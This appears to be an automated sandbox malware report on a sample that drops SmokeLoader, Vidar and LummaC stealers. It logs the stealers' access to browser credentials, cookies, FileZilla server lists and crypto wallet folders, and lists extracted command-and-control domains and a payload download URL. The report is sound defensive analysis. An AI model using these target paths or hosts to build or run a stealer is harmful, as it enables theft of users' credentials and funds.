Source: C:\Users\user\AppData\Local\Temp\F441.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.json	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp

File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml

Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\AppData\Local\Temp\F441.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	File opened: C:\Users\user\AppData\Roaming\Exodus\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	File opened: C:\Users\user\AppData\Roaming\Exodus\backups\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	File opened: C:\Users\user\AppData\Roaming\MultiDoge\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	File opened: C:\Users\user\AppData\Roaming\Binance\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	File opened: C:\Users\user\AppData\Roaming\Ledger Live\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\	Jump to behavior

Searches for user specific document files

Source: C:\Users\user\AppData\Local\Temp\F441.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Directory queried: C:\Users\user\Documents\DTBZGIOOSO	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Directory queried: C:\Users\user\Documents\DVWHKMNFNN	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Directory queried: C:\Users\user\Documents\HTAGVDFUIE	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Directory queried: C:\Users\user\Documents\JSDNGYCOWY	Jump to behavior

Yara detected Credential Stealer

Source: Yara match	File source: Process Memory Space: F441.exe PID: 3192, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: kat796E.tmp PID: 6620, type: MEMORYSTR

Remote Access Functionality

Yara detected CryptOne packer

Source: Yara match

File source: 00000008.00000002.2367245852.0000000004299000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Yara detected LummaC Stealer

Source: Yara match

File source: sslproxydump.pcap, type: PCAP

Yara detected SmokeLoader

Source: Yara match	File source: 00000005.00000002.1997200798.0000000002E41000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1712388101.0000000002DE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.1997158048.0000000002E20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1712494428.0000000002E51000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY

Yara detected Vidar

Source: Yara match

File source: sslproxydump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match	File source: 8.2.9EDA.exe.44d0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.9EDA.exe.4490000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.9EDA.exe.4267719.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.9EDA.exe.4490000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.9EDA.exe.4267719.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.9EDA.exe.44d0000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.2367767500.00000000044D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2367654116.0000000004490000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2367245852.0000000004190000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 9EDA.exe PID: 2124, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: kat796E.tmp PID: 6620, type: MEMORYSTR

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6D080D60 sqlite3_bind_parameter_name,	9_2_6D080D60
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6D080C40 sqlite3_bind_zeroblob,	9_2_6D080C40
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6CFA8EA0 sqlite3_clear_bindings,	9_2_6CFA8EA0
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6D080B40 sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_double,sqlite3_bind_zeroblob,	9_2_6D080B40
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6CFA6410 bind,WSAGetLastError,	9_2_6CFA6410
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6CFA60B0 listen,WSAGetLastError,	9_2_6CFA60B0
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6CFA6070 PR_Listen,	9_2_6CFA6070
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6CFAC050 sqlite3_bind_parameter_index,strlen,strncmp,strncmp,	9_2_6CFAC050
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6CFAC030 sqlite3_bind_parameter_count,	9_2_6CFAC030
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6CF322D0 sqlite3_bind_blob,	9_2_6CF322D0
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6CFA63C0 PR_Bind,	9_2_6CFA63C0
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6CFA94F0 sqlite3_bind_text16,	9_2_6CFA94F0
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6CFA94C0 sqlite3_bind_text,	9_2_6CFA94C0
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6CFA9480 sqlite3_bind_null,	9_2_6CFA9480
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6CFA9400 sqlite3_bind_int64,	9_2_6CFA9400

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
23.145.40.124	unknown	Reserved	22631	SURFAIRWIRELESS-IN-01US	true
104.102.42.29	steamcommunity.com	United States	16625	AKAMAI-ASUS	true
188.114.96.3	whispedwoodmoodsksl.shop	European Union	13335	CLOUDFLARENETUS	true
185.18.245.58	unknown	Azerbaijan	39232	UNINETAZ	true
185.235.137.54	unknown	Iran (ISLAMIC Republic Of)	202391	AFRARASAIR	false
65.109.242.59	unknown	United States	11022	ALABANZA-BALTUS	false
91.202.233.231	unknown	Russian Federation	9009	M247GB	true
190.28.110.209	dbfhns.in	Colombia	13489	EPMTelecomunicacionesSAESPCO	true
45.129.96.86	unknown	Estonia	208440	GMHOST-EE	true

Contacted Domains

Name	IP	Active
whispedwoodmoodsksl.shop	188.114.96.3	true
steamcommunity.com	104.102.42.29	true
dbfhns.in	190.28.110.209	true

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
whispedwoodmoodsksl.shop	true	17%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://guteyr.cc/tmp/index.php	true	13%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://65.109.242.59/nss3.dll	false	Avira URL Cloud: safe	unknown
https://65.109.242.59/freebl3.dll	false	Avira URL Cloud: safe	unknown
http://45.129.96.86/file/update.exe	true	20%, Virustotal, Browse Avira URL Cloud: malware	unknown
https://steamcommunity.com/profiles/76561199689717899	true	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://65.109.242.59/mozglue.dll	false	Avira URL Cloud: safe	unknown
https://65.109.242.59/vcruntime140.dll	false	Avira URL Cloud: safe	unknown
holicisticscrarws.shop	true	Avira URL Cloud: malware	unknown

AV Detection

Antivirus / Scanner detection for submitted sample

Source: 4.exe

Avira: detected

Antivirus detection for URL or domain

Source: whispedwoodmoodsksl.shop	Avira URL Cloud: Label: malware
Source: http://45.129.96.86/file/update.exe	Avira URL Cloud: Label: malware
Source: https://whispedwoodmoodsksl.shop/l	Avira URL Cloud: Label: malware
Source: https://whispedwoodmoodsksl.shop/aFX	Avira URL Cloud: Label: malware
Source: https://whispedwoodmoodsksl.shop/B9E	Avira URL Cloud: Label: malware
Source: holicisticscrarws.shop	Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Roaming\sdveeeu	Avira: detection malicious, Label: HEUR/AGEN.1311176
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Avira: detection malicious, Label: TR/AVI.AceCrypter.javlp

Found malware configuration

Source: 00000000.00000002.1712388101.0000000002DE0000.00000004.00001000.00020000.00000000.sdmp	Malware Configuration Extractor: SmokeLoader {"Version": 2022, "C2 list": ["http://dbfhns.in/tmp/index.php", "http://guteyr.cc/tmp/index.php", "http://greendag.ru/tmp/index.php", "http://lobulraualov.in.net/tmp/index.php"]}
Source: 00000008.00000002.2367767500.00000000044D0000.00000004.00001000.00020000.00000000.sdmp	Malware Configuration Extractor: Vidar {"C2 url": ["https://steamcommunity.com/profiles/76561199689717899"], "Botnet": "42d0618304a88d6476bc55d33c23d7e6", "Version": "9.8"}
Source: F441.exe.3192.6.memstrmin	Malware Configuration Extractor: LummaC {"C2 url": ["boredimperissvieos.shop", "holicisticscrarws.shop", "sweetsquarediaslw.shop", "plaintediousidowsko.shop", "miniaturefinerninewjs.shop", "zippyfinickysofwps.shop", "obsceneclassyjuwks.shop", "acceptabledcooeprs.shop", "whispedwoodmoodsksl.shop", "boredimperissvieos.shop", "holicisticscrarws.shop", "sweetsquarediaslw.shop", "plaintediousidowsko.shop", "miniaturefinerninewjs.shop", "zippyfinickysofwps.shop", "obsceneclassyjuwks.shop", "acceptabledcooeprs.shop", "whispedwoodmoodsksl.shop", "boredimperissvieos.shop", "boredimperissvieos.shop", "holicisticscrarws.shop", "sweetsquarediaslw.shop", "plaintediousidowsko.shop", "miniaturefinerninewjs.shop", "zippyfinickysofwps.shop", "obsceneclassyjuwks.shop", "acceptabledcooeprs.shop", "whispedwoodmoodsksl.shop"], "Build id": "swg5EG--"}

Multi AV Scanner detection for domain / URL

Source: whispedwoodmoodsksl.shop	Virustotal: Detection: 17%	Perma Link
Source: dbfhns.in	Virustotal: Detection: 5%	Perma Link
Source: whispedwoodmoodsksl.shop	Virustotal: Detection: 17%	Perma Link
Source: http://guteyr.cc/tmp/index.php	Virustotal: Detection: 12%	Perma Link
Source: https://65.109.242.59/f	Virustotal: Detection: 12%	Perma Link
Source: http://45.129.96.86/file/update.exe	Virustotal: Detection: 20%	Perma Link
Source: https://65.109.242.59	Virustotal: Detection: 7%	Perma Link

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\F441.exe	ReversingLabs: Detection: 95%
Source: C:\Users\user\AppData\Roaming\sdveeeu	ReversingLabs: Detection: 39%

Multi AV Scanner detection for submitted file

Source: 4.exe	ReversingLabs: Detection: 39%
Source: 4.exe	Virustotal: Detection: 45%			Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\sdveeeu	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\9EDA.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: 4.exe

Joe Sandbox ML: detected

Uses Microsoft's Enhanced Cryptographic Provider

Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: 6_2_0041537E CryptUnprotectData,	6_2_0041537E
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6CFFA9A0 PK11SDR_Decrypt,PORT_NewArena_Util,SEC_QuickDERDecodeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_GetInternalKeySlot,PK11_Authenticate,PORT_FreeArena_Util,PK11_ListFixedKeysInSlot,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_FreeSymKey,PORT_FreeArena_Util,PK11_FreeSymKey,SECITEM_ZfreeItem_Util,	9_2_6CFFA9A0
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6CFF44C0 PK11_PubEncrypt,	9_2_6CFF44C0
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6D0425B0 PK11_Encrypt,memcpy,PR_SetError,PK11_Encrypt,	9_2_6D0425B0
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6CFF4440 PK11_PrivDecrypt,	9_2_6CFF4440
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6CFC4420 SECKEY_DestroyEncryptedPrivateKeyInfo,memset,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,free,	9_2_6CFC4420
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6CFDE6E0 PK11_AEADOp,TlsGetValue,EnterCriticalSection,PORT_Alloc_Util,PK11_Encrypt,PORT_Alloc_Util,memcpy,memcpy,PR_SetError,PR_SetError,PR_Unlock,PR_SetError,PR_Unlock,PK11_Decrypt,PR_GetCurrentThread,PK11_Decrypt,PK11_Encrypt,memcpy,memcpy,PR_SetError,free,	9_2_6CFDE6E0
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6D01A730 SEC_PKCS12AddCertAndKey,PORT_ArenaMark_Util,PORT_ArenaMark_Util,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,PR_SetError,PR_SetError,PK11_GetInternalKeySlot,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,SECKEY_DestroyEncryptedPrivateKeyInfo,strlen,PR_SetError,PORT_FreeArena_Util,PORT_FreeArena_Util,PORT_ArenaAlloc_Util,PR_SetError,	9_2_6D01A730
